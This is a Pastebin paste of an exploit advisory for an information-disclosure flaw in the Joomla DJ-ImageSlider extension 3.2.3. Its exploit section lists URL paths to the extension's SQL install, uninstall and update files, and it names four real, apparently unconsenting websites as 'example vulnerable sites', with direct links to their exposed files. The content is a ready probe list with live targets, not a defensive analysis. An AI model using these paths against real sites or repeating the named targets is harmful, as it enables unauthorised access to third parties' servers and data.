API tools faq
paste
KingSkrupellos

Joomla com_djimageslider Components AIO 3.2.3 Database

KingSkrupellos
Nov 26th, 2018
180
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.65 KB | None | 0 0
raw download clone embed print report
  1. #################################################################################################
  2.  
  3. # Exploit Title : Joomla com_djimageslider Components All in One 3.2.3 Database Backup Information Disclosure
  4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
  5. # Date : 27/11/2018
  6. # Vendor Homepage : joomla.org ~ dj-extensions.com
  7. # Tested On : Windows and Linux
  8. # Software Download Links :
  9. + dj-extensions.com/downloads/cat_view/76-dj-imageslider
  10. + sourceforge.net/p/giaiphapantoan/svn/24/tree/giaiphapantoanweb/administrator/components/com_djimageslider/
  11. + extensions.joomla.org/extension/dj-imageslider/
  12. + DJ-ImageSlider AIO (All In One) [Joomla 3.x] =>
  13. dj-extensions.com/downloads/doc_download/82-dj-imageslider-aio-all-in-one-joomla-3x
  14. + DJ-ImageSlider AIO (All In One) [Joomla 2.5] =>
  15. dj-extensions.com/downloads/doc_download/234-dj-imageslider-aio-all-in-one-joomla-25
  16. # Category : WebApps
  17. # Version Information : 3.2.3
  18. # Exploit Risk : Low
  19. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
  20. CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
  21. CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
  22.  
  23. #################################################################################################
  24.  
  25. # Admin Panel Login Path :
  26.  
  27. /administrator/
  28.  
  29. # Exploit :
  30.  
  31. /administrator/components/com_djimageslider/sql/._install.sql
  32.  
  33. /administrator/components/com_djimageslider/sql/install.sql
  34.  
  35. /administrator/components/com_djimageslider/sql/._uninstall.sql
  36.  
  37. /administrator/components/com_djimageslider/sql/uninstall.sql
  38.  
  39. /administrator/components/com_djimageslider/sql/updates/._1.3.sql
  40.  
  41. /administrator/components/com_djimageslider/sql/updates/1.3.sql
  42.  
  43. /administrator/components/com_djimageslider/sql/updates/._2.0.sql
  44.  
  45. /administrator/components/com_djimageslider/sql/updates/2.0.sql
  46.  
  47. #################################################################################################
  48.  
  49. # Example Vulnerable Sites =>
  50.  
  51. [+] ose.gr/administrator/components/com_djimageslider/sql/updates/2.0.sql
  52.  
  53. [+] moob.cl/clientes/__MACOSX/puc/administrator/components/com_djimageslider/sql/updates/._2.0.sql
  54.  
  55. [+] matekap.com/__MACOSX/360/immo/administrator/components/com_djimageslider/sql/updates/._2.0.sql
  56.  
  57. [+] ahaic.org/__MACOSX/reff/administrator/components/com_djimageslider/sql/updates/._2.0.sql
  58.  
  59. #################################################################################################
  60.  
  61. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  62.  
  63. #################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!